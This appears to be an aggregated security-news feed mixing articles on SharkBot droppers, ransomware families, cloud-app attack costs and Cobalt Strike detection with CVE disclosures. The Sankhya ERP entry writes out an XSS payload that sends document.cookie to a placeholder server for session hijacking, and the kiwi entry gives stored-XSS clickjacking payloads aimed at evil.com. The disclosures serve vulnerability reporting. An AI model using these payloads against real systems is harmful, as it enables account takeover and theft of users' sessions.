By Habiba Rashid
According to Bitdefender, most of the malicious apps were aimed at users in Italy and the United Kingdom.
This is a post from HackRead.com Read the original post: SharkBot Banking Trojan Returns to Google Play Store

SharkBot banking trojan, as we know it, has been targeting Android devices for a while now. What appears to have become a trend was recently identified by Bitdefender when they found a trove of malicious apps in the official Google Play Store that pushed aggressive unwanted ads which could potentially lead to more serious attacks.

This finding was not surprising since, in the last few months, malicious apps have begun to be distributed directly from the official store which makes people inclined to believe that they’re safe. 

Through their real-time behavioral technology designed to detect softwares acting suspiciously, the research team at Bitdefender uncovered apps downloaded from Google Play acting as droppers for SharkBot banking trojan a short while after being installed. 

> “The Google Play Store would likely detect a trojan banker uploaded to their repository, so criminals resort to more covert methods. One way is with an app, sometimes legitimate with some of the advertised features, that doubles as a dropper for more insidious malware,”.
> 
> Bitdefender

The apps that Bitdefender found were disguised as file managers, which allows them to easily request and gain permission from the user to install external packages. What adds to their disguise and allows them to evade detection is that the malicious behavior is activated to a restricted pool of users and Google Play apps only need the functionality of a file manager to install another app. 

One of the identified apps is called X-File Manager which installs SharkBot samples with the label \_File Manager, tricking the user into believing that an update for the app needs to be installed before using it. 

What’s interesting in this case is that they target users depending on their location and most users who have downloaded the apps are either primarily from the United Kingdom or Italy. Furthermore, the developer profile on Google Play is also only visible to users from Italy or the United Kingdom. The page cannot be accessed without specifying the country code. 

Bitdefender’s technical writeup also revealed that the application performed anti-emulator checks and targeted users from Great Britain and Italy by verifying if the SIM ISO corresponded with IT or GB. It also checks if one of the targeted banking applications has been installed on the user’s device. 

The app has been removed from Google Play at the time of writing but is available on other websites. Similar malicious apps identified by Bitdefender include FileVoyager and LiteCleaner M. 

1.  SandStrike Spyware Infecting Android Devices through VPN Apps
2.  VirusTotal Reveals Apps Most Exploited by Hackers to Spread Malware
3.  New Dropper Apps on Play Store Targeting Banking and Crypto Wallets
4.  Fake Antivirus Apps on Play Store Loaded with SharkBot Banking Trojan
5.  Malicious Security App on Play Store Caught Dropping SharkBot Malware

I am a cyber security writer and one of my favourite games is Minecraft. I also really like obscure cat memes and during my free time, if I'm not found hanging around in Discord voice channels with my friends, I'm probably cycling and taking pictures of random cats on the street.

SharkBot Banking Trojan Returns to Google Play Store

Orgs are in the middle of a rapid increase in the use of new collaboration tools to serve the needs of an increasingly dispersed workforce — and they're paying a very real security price.

Enterprises are spending nearly $1,200 a year per employee to address the risk that cloud-based workforce collaboration apps bring to their business. 

It's a well-known reality at this point that with corporate workers more dispersed than ever due to the changing work patterns introduced during the pandemic, enterprises are increasingly relying on new Web-based tools beyond email. These include cloud-based messaging, storage, shared workplaces, customer relationship management (CRM), and other apps and services.

The problem is, these tools also have widely expanded the attack surface for threat actors and increased exposure of corporate assets to the internet. Cybercriminals have quickly recognized the opportunity to exploit this reality — helped along by the fact that many of these apps are largely unproven, security-wise, according to a white paper published Nov. 22 by Osterman Research and sponsored by Perception Point.

"Threat actors have responded quickly to the emergence of new channels for employee productivity and collaboration," the researchers wrote.

Specifically, organizations are now paying $1,197 per employee each year to address successful cyber incidents across email services, cloud collaboration apps or services, and Web browsers — meaning a 500-employee company spends, on average, $600,000 on an annual basis, the researchers found. This cost excludes compliance fines, ransomware mitigation costs, and business losses from non-operational processes, they said.

Researchers ran a survey of 250 security and IT decision-makers to parse this surge in malicious incidents against these new services, and found that 60% of the attack attempts arrive via email — which remains the most widely attacked enterprise service, the researchers found.

Moreover some attacks — such as those involving malware installed on an endpoint — are occurring with even more frequency, up 87%.

The situation is only likely to get worse, with more than 70% of respondents believing the frequency of security threats will remain the same or increase over the next two years, the researchers said. This outlook is due to the time organizations need time to respond to the rapid rate of expansion in the use of these apps and adjust their new security posture accordingly, they acknowledged.

**Too Many Cloud Collaboration Apps?**

On average, organizations surveyed said they use about six various apps and services for communication and collaboration across their workforce. 

Among the most popular apps being used for workforce collaboration now include messaging apps such as Microsoft Teams, Slack, or WhatsApp; cloud storage and collaboration apps such as Google Drive, OneDrive, SharePoint, or Box; shared workspaces such as Microsoft Teams, Google Workspace, or Huddle; enterprise social networks such as Facebook Workplace, Jive, or Microsoft Yammer; CRM tools such as Salesforce, HubSpot, Zendesk, or Microsoft Dynamics CRM; cloud storage services such as AWS S3 buckets or Microsoft Blob Storage; and online meeting tools such as Zoom, WebEx, or Microsoft Teams meetings.

Moreover, employees also use a host of unsanctioned communication and cloud collaboration apps, such as personal Dropbox storage accounts or personal Zoom accounts, which also put the enterprise at risk.

There have been recent security incidents that highlight the vulnerability of these apps and why enterprises should be paying close attention. Researchers from Varonis Threat Labs, for instance, recently found multiple security vulnerabilities — including a nasty SQL injection bug — in Zendesk's Web-based CRM platform that could have allowed attackers to access sensitive information from potentially any customer account.

Meanwhile, legions of databases — and, thus, customers' personally identifiable information (PII) — are being inadvertently exposed to the Internet monthly through a feature of Amazon Relational Database Service, a popular cloud-based data-backup service offered by Amazon Web Services, according to recent research from the Mitiga Research Team.

Both of these incidents demonstrate the security weaknesses lurking in the cloud-based apps that are becoming the backbone of enterprise workforce collaboration, with 19% of respondents acknowledging that they use as many as nine of these tools, significantly increasing their attack surface, the researchers said.

"Using such a wide range of tools increases the amount of vectors which attackers can target," they wrote.

Not only are there more attacks against these apps and services but they're also increasing in sophistication, the researchers found. A full 72% of respondents indicated that attacks against cloud storage services have grown more sophisticated over the past year, and 57% said the same about attacks against email.

"This trend is especially concerning given the rapid rate of adoption of new cloud-based apps and services," the researchers noted.

**How to Respond**

The situation clearly demands a response from enterprises, which have a number of options for how they can address and minimize their risk of attack against these various apps and services, the researchers said.

However, it will take some effort on their part, including an updating of traditional security postures, noted Michael Sampson, senior analyst at Osterman Research

"Organizations cannot afford — financially or reputationally — to rely on outdated approaches," he said in a press statement. "Our survey demonstrates the clear need for agile and holistic threat prevention solutions."

Enterprises are already on the case, according to the report. Some ways organizations said they will try to mitigate the situation in the coming year include deploying at least one new security tool to combat threats, with 69% of respondents saying they plan to deploy three or more.

Enterprises also should be consolidating their security stack for more holistic and efficient threat protection, as well as leveraging managed services to support their security teams with scalable and flexible incident response capabilities, the researchers advised.

"Fast, holistic, and accurate threat prevention across all channels is singularly important in an era of increasingly frequent and sophisticated cyber incidents," they wrote.

Enterprises Pay $1,200 Per Employee Annually to Fight Cyberattacks Against Cloud Collab Apps

Google Workspace's team is seeing a spike in phishing and spam hitting Gmail — up 10% in just the last two weeks.

'Tis the season for cybercrime and scams: Just ask Google.

As we move into the holiday season, the cloud giant is already spotting and stopping 10% more spam and phishing messages than usual: It blocked more than 231 billion spam and phishing emails in just the past two weeks. On average, Google says it catches and stops around 15 billion of these sketchy emails in Gmail per day, accounting for 99.9% of all spam, phishing, and malware-laden messages in the service.

Google Workspace Trust & Safety manager Nelson Bradley warned in a Nov. 22 blog post of five main themes and types of email scams to watch out for: gift cards and giveaways; phony charity lures; demographic-targeting; false subscription renewals; and cryptocurrency scams.

Nelson recommends users take time to think over an email before responding, as well as spot-check the information in the email, and, of course, not respond with any personal information or payment. 

"No reputable person or agency will ever demand payment or your personal information on the spot," he wrote.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Google Blocks 231B Spam, Phishing Emails in Past 2 Weeks

ERP Sankhya before v4.11b81 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Caixa de Entrada.

\# Exploit Title: ERP Sankhya - XSS to Account Takeover

\# Google Dork: N/A

\# Date: 19/10/2022

\# Exploit Author: Lucas Alves Da Cunha - (0xLucas)

\# Vendor Homepage: https://www.sankhya.com.br

\# Version: Sankhya Om <= 4.13.x

\# Tested on: Sankhya Om 4.11

\# CVE: CVE-2022-42989

\# Descrição:

Um usuário comum no ERP Sankhya pode enviar uma mensagem para qualquer outro usuário do sistema inclusive administradores, através da função "Caixa de Entrada". No corpo da mensagem, podemos injetar códigos html/javascript levando para um cross site scripting.

Payload para verificar existência da vulnerabilidade:

<img src=1 onerror=alert(1)>

Payload utilizado para capturar os dados da sessão do usuário:

<img src=1 onerror=document.location="http://yourserver/?cookie="+document.cookie>

\# Passos para reprodução:

1 - Encontrando a funcionalidade: https://i.imgur.com/B9SWknH.png

2 - Enviando payload para verificar existência da vulnerabilidade: https://i.imgur.com/ZKSkLmx.png

2.1 - Vulnerabilidade comprovada: https://i.imgur.com/1KiAa1m.png

3 - Explorando a vulnerabilidade: https://i.imgur.com/n8Jevum.png

3.1 - Sessão capturada: https://i.imgur.com/aDatjyN.png

Podemos utilizar os dados da sessão capturada e manipular a sessão utilizando a ferramenta: Cookie-Editor do Google Chrome, e assim entraremos na sessão do usuário desejado. Conforme a imagem a seguir: https://i.imgur.com/L10Yf9f.png

\# Impacto:

Explorando essa vulnerabilidade, podemos comprometer qualquer conta de usuário do sistema, desde uma simples conta até mesmo uma conta de administrador do sistema, causando assim um grande impacto de negócio.

CVE-2022-42989: CVEs/SankhyaERP_XSS_Account_Takeover.txt at main · 0xLUC4S/CVEs

A cross-site scripting (XSS) vulnerability in Record Management System using CodeIgniter 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Add Subject page.

\[Suggested description\] A cross-site scripting (XSS) vulnerability in Record Management System using CodeIgniter 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Add Subject page.

\[Additional Information\] Proof Of Concept: https://phpgurukul.com/teachers-record-management-system-using-codeigniter/

\[Vulnerability Type\] Cross Site Scripting (XSS)

\[Vendor of Product\] Phpgurukul

\[Affected Product Code Base\] Teachers Record Management System using CodeIgniter - 1.0

\[Affected Component\] Source Code

\[Attack Type\] Remote

\[Impact Code execution\] true

\[Attack Vectors\] to Exploit the Vulnerability Attacker need to Login With Admin Account First and then attacker need to goto Add Subject Page then in Add Subject Page Attacker need to Add the Arbitrary JavaScript Payload then Click Submit once subject added successfully, now Login with Teacher Account and Goto User Details then Profile View, once you will visit the Profile View the Payload will Execute

\[Reference\] https://phpgurukul.com/teachers-record-management-system-using-codeigniter/ https://drive.google.com/file/d/18OjJQA2-8-Hdt0HTMwp4aL\_Mp\_WuffvL/view?usp=sharing

\[Discoverer\] RashidKhan Pathan

Use CVE-2022-41445.

CVE-2022-41445: GitHub - RashidKhanPathan/CVE-2022-41445: Cross Site Scripting in Teacher's Record Management System using CodeIgnitor

The popular pen-testing tool is often cracked and repurposed by threat actors. Google now has a plan to address that.

Cobalt Strike, a popular red-team tool for detecting software vulnerabilities, has been repurposed by cyberattackers so frequently that publisher Fortra instituted a system for vetting potential buyers. In response, malicious actors have switched to using cracked versions of the software distributed online like any other hacker tool. Google's Cloud Security team has now come up with a way to counteract these shady uses while not interfering with legitimate ones: version detection.

Threat actors have easy access to Cobalt Strike through pirating, but these illegitimate versions usually cannot be updated, wrote Greg Sinclair, security engineer for cloud threat intelligence at Google. That provides Google researchers with a way to spot potentially malicious use by identifying the version of the software being used and flagging anything earlier than the current version.

To identify the version, Google researchers analyzed the Cobalt Strike JAR files from the past 10 years and generated signatures for the various components — 165 in all. Then the team bundled the signatures into a VirusTotal collection and released them as open source YARA rules on GitHub.

"Since many threat actors rely on cracked versions of Cobalt Strike to advance their cyberattacks, we hope that by disrupting its use we can help protect organizations, their employees, and their customers around the globe," Sinclair wrote.

Earlier in November, Google Cloud Threat Intelligence released on GitHub a similar set of signatures to detect Sliver, as Bleeping Computer pointed out. The command-and-control framework has been supplanting Cobalt Strike as the repurposed security tool of choice by some threat actors.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Google Releases YARA Rules to Disrupt Cobalt Strike Abuse

A stored XSS in a kiwi Test Plan can run malicious javascript which could be chained with an HTML injection to perform a UI redressing attack (clickjacking) and an HTML injection which disables the use of the history page.

**Description**

Stored XSS, also known as persistent XSS, is the more damaging of the XSS. It occurs when a malicious script is injected directly into a vulnerable web application. Due to a sanitization problem it is possible to perform both a Stored XSS and an HTML injection. Thanks to this attack it is possible to disable the history page making it unusable (for example I created a transparent page above with an infinite redirect), or it is possible to create a stored XSS.

The problem is that the markdown input is sanitized in the TestPlan, but it is not sanitized by the history page. On the history page it will run.

**Proof of Concept**

1 - Insert one of the following payloads into a Test Plan.

2 - Go to the history

**Stored XSS:**

    <a href="https://evil.com/users/signin" onmouseover="confirm(document.cookie)" style="position: fixed; top: 0; right: 0; width: 10000px; height: 10040px; opacity:0.00001;">foo</a>
    
    

**Stored HTML Injection - Disable the history page:**

    <a href='https://evil.com/users/signin' style='position: fixed; top: 0; right: 0; width: 10000px; height: 10040px; opacity:0.00001;'>foo</a>
    

**POC Video (Payload execution):**

https://drive.google.com/file/d/1n7ZSrOOIb47vZro4ck2-hPRkzbSiX8CF/view?usp=sharing

**Update:**

I made a video where a basic user (not an admin) creates a testplan. When Admin goes into the history of the testplan created by the basic user, the XSS will appear (stored blind XSS)

**POC:**

https://drive.google.com/file/d/1FlGvATGWKWXXoMB6h2Z-JOX1gVhkssx5/view?usp=share\_link

**Impact**

Stored XSS to run malicious javascript.

2.  HTML Injection to perform a UI redressing attack (clickjacking)
3.  HTML injection which disables the use of the history page

CVE-2022-4105: Stored XSS and HTML injection from markdown  in kiwi

By Deeba Ahmed
AXLocker ransomware is now known as a threat that targets Discord users.
This is a post from HackRead.com Read the original post: Researchers Reveal Details of New Threats: AXLocker, Octocrypt and Alice Ransomware

Cyble Research and Intelligence Labs has discovered three new ransomware families that encrypt the victim’s documents and enable a Discord ATO (account takeover) to steal data.

The three variants include AXLocker, Octocrypt, and Alice Ransomware. It is worth noting that Discord is relatively popular among crypto and gaming communities.

(1) AXLocker’s dashboard – (2) Octocrypt’s ransom note (3) Alice’s ransom note (4) AXLocker’s ransom note – Images: Cyble –

**Ransomware Details- AXLocker**

Code analysis of the AXLocker ransomware revealed that it functions like any malware but only targets file extensions with AES encryption. The Startencryption() function makes the system capable of searching documents by enumerating the available directories on the C:\\ drive. Unlike other ransomware, AXLocker never modifies the encrypted files’ names or extensions.

Before encrypting, the ransomware steals the Discord tokens. The platform uses these tokens to authenticate users after logging into their accounts. This lets the attackers hijack the accounts for further malware propagation and fraud.

Once the Discord tokens are sent to an external server and the files are encrypted, the ransomware displays a pop-up window that contains the ransom note. There’s a timer that keeps ticking until the decryption key gets deleted.

**Octocrypt**

Another ransomware variant discovered by Cyble security researchers was Octocrypt. It is ransomware-as-a-service ransomware that targets Windows-based systems. Octocrypt was found in October 2022 and can be purchased on cybercrime forums for $400.

The variant’s web panel builder lets attackers generate ransomware binary executables after entering API, URL, crypto address, crypto amount, and contact email ID. Threat actors may download the payload file by clicking the URL contained in the web panel under payload details.

**Alice**

The third ransomware variant discovered was dubbed Alice or Alice in the Land of Malware. The ransomware builder is available for only $600 per month, and in return, the buyer gets responsive support, customization elements, and faster encryption capabilities. Moreover, it also offers compatibility with Asian/Arab PCs.

In their blog post, Cyble researchers stated that organizations should improve their scanning for the early warning signs of new variants and compromised credentials to thwart potential attacks. Enterprises must stay ahead of the attack techniques threat actors use to target their systems. This is possible only through implementing security best practices and enhanced security controls.

> “Threat actors are increasingly attempting to maintain a low profile to avoid drawing the attention of law enforcement agencies.”

1.  Lessons from the Holy Ghost Ransomware Attacks
2.  Ransomware Gang Leaks Medibank Data on Dark Web
3.  Royal Ransomware Uses Google Ads and Cracked Software

Researchers Reveal Details of New Threats: AXLocker, Octocrypt and Alice Ransomware

Sourcecodester Password Storage Application in PHP/OOP and MySQL 1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the Name, Username, Description and Site Feature parameters.

\[Suggested description\] Sourcecodester Password Storage Application in PHP/OOP and MySQL 1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the Name, Username, Description and Site Feature parameters.

\[Additional Information\] Proof Of Concept: https://drive.google.com/file/d/1ZmAuKMVzUpL8pt5KXQJk8IyPECoVP9xw/view?usp=sharing Vendor Homepage: https://www.sourcecodester.com/php/15726/password-storage-application-phpoop-and-mysql-free-source-code.html Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/psa\_php.zip

\[Vulnerability Type\] Cross Site Scripting (XSS)

\[Vendor of Product\] Sourcecodester

\[Affected Product Code Base\] Password Storage Application in PHP/OOP and MySQL - 1.0

\[Affected Component\] Source Code

\[Attack Type\] Remote

\[Impact Code execution\] true

\[Attack Vectors\] to Exploit this vulnerability attacker need to first create his account on http://localhost/psa\_php/owner\_registration.php, then login with created password after login, attacker need to inject arbitrary JavaScript code inside Name, Username, Description and Site field, and then click on save, once attacker clicks on save button the arbitrary JavaScript Payload will Execute

\[Reference\] https://www.sourcecodester.com/php/15726/password-storage-application-phpoop-and-mysql-free-source-code.html https://drive.google.com/file/d/1ZmAuKMVzUpL8pt5KXQJk8IyPECoVP9xw/view?usp=sharing

\[Discoverer\] RashidKhan Pathan

CVE-2022-43117: GitHub - RashidKhanPathan/CVE-2022-43117

Sourcecodester Event Registration App v1.0 was discovered to contain multiple CSV injection vulnerabilities via the First Name, Contact and Remarks fields. These vulnerabilities allow attackers to execute arbitrary code via a crafted excel file.

\[Suggested description\] Sourcecodester Event Registration App v1.0 was discovered to contain multiple CSV injection vulnerabilities via the First Name, Contact and Remarks fields. These vulnerabilities allow attackers to execute arbitrary code via a crafted excel file.

\[Additional Information\] Proof of Concept: https://drive.google.com/file/d/17rSb8GLFPQfqnVFI56AYffbVMDg8z75t/view?usp=sharing Vendor Homepage: https://www.sourcecodester.com/javascript/15214/event-registration-app-export-csv-javascript-free-source-code.html Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/registration.zip

\[VulnerabilityType Other\] CSV Injection

\[Vendor of Product\] Sourcecodester

\[Affected Product Code Base\] Event Registration App with Export to CSV in JavaScript - 1.0

\[Affected Component\] Source Code

\[Attack Type\] Remote

\[Impact Code execution\] true

\[Attack Vectors\] in order to exploit this Vulnerability, the attacker need to insert an Excel Formula into the First Name, Contact, and Remarks fields, then click on Save then Click on Export to CSV and then click on Downloaded CSV in Excel once attacker open the Downloaded CSV File in Excel the Payload will Execute

\[Reference\] https://drive.google.com/file/d/17rSb8GLFPQfqnVFI56AYffbVMDg8z75t/view?usp=sharing https://www.sourcecodester.com/javascript/15214/event-registration-app-export-csv-javascript-free-source-code.html https://www.sourcecodester.com/sites/default/files/download/oretnom23/registration.zip

\[Discoverer\] RashidKhan Pathan

Use CVE-2022-44830.

Tag

#google